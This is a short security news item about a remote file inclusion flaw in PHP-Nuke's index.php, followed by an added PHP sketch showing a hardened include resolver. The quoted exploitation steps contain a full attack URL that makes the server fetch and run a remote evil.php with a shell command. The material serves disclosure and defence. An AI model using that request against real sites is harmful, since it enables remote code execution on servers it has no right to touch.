PHP-Nuke allows Command Execution & Much more
Source: SecurityFocus
A poster using the handle Nopman wrote to BugTraq to explain the latest MAJOR vulnerability found in PHP-Nuke, the popular web portal software and close relative of the derivative software PostNuke. He states: "I've found a serious security flaw in PHP-Nuke. It allows users to execute any PHP code.
The flaw is in the index.php's include file feature.
It allows including files like index.php?file=file
It prevents users including ..'s in URL's, but
it didn't prevent users from entering http://-urls
Remember the PHP's remote get feature...
How to exploit:
He provides a simple three-line command that this publishing software will not
permit to be saved or displayed. (You will have to get the code at
SecurityFocus.) You then upload this three-line file to some free web space
provider or set up your own server:
Then just requesting
http://insecure-server/index.php?file=http://where.the.bad.php.file.is/evil.php&cmd=ls%20-al
will execute ls -al command.
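
The flaw described above is a check that rejects ".." in the file parameter but still lets an http:// URL reach the include. As an added example (not PHP-Nuke's code and not taken from the advisory), the sketch below contrasts that check with a resolver that accepts only bare module names and confirms the resolved path stays inside one directory; MODULE_DIR, dotdot_only_check and resolve_include are hypothetical names.

```php
<?php
// Added example: hypothetical names, not PHP-Nuke's actual code.
// Assumption: includable pages live as <name>.php under MODULE_DIR.
const MODULE_DIR = __DIR__ . '/modules';

// The kind of check the advisory describes: only ".." is rejected,
// so a value that starts with http:// passes untouched.
function dotdot_only_check(string $file): bool
{
    return strpos($file, '..') === false;
}

// Hardened form: the parameter is treated as a bare module name,
// never as a path or URL, and the resolved file must sit in MODULE_DIR.
function resolve_include(string $file): ?string
{
    // Letters, digits, "_" and "-" only: no scheme, slash, dot or NUL byte.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\z/', $file)) {
        return null;
    }
    $base = realpath(MODULE_DIR);
    $path = realpath(MODULE_DIR . '/' . $file . '.php');
    if ($base === false || $path === false) {
        return null; // directory or module file does not exist
    }
    // realpath() resolves symlinks; the result must still be under $base.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}

// Constructed sample inputs; the URL is the one quoted in the post.
$samples = ['news', '../config', 'http://where.the.bad.php.file.is/evil.php'];
foreach ($samples as $s) {
    printf(
        "%-45s dotdot-only: %-6s hardened: %s\n",
        $s,
        dotdot_only_check($s) ? 'pass' : 'reject',
        resolve_include($s) === null ? 'reject' : 'allow'
    );
}
// In an index.php-style dispatcher the result would gate the include:
//   $path = resolve_include($_GET['file'] ?? '');
//   if ($path === null) { http_response_code(404); exit; }
//   include $path;
```

The 'news' sample is allowed only if modules/news.php actually exists next to the script. Independently of the application code, the php.ini setting allow_url_include = Off (the default since PHP 5.2) stops include from fetching http:// URLs at all.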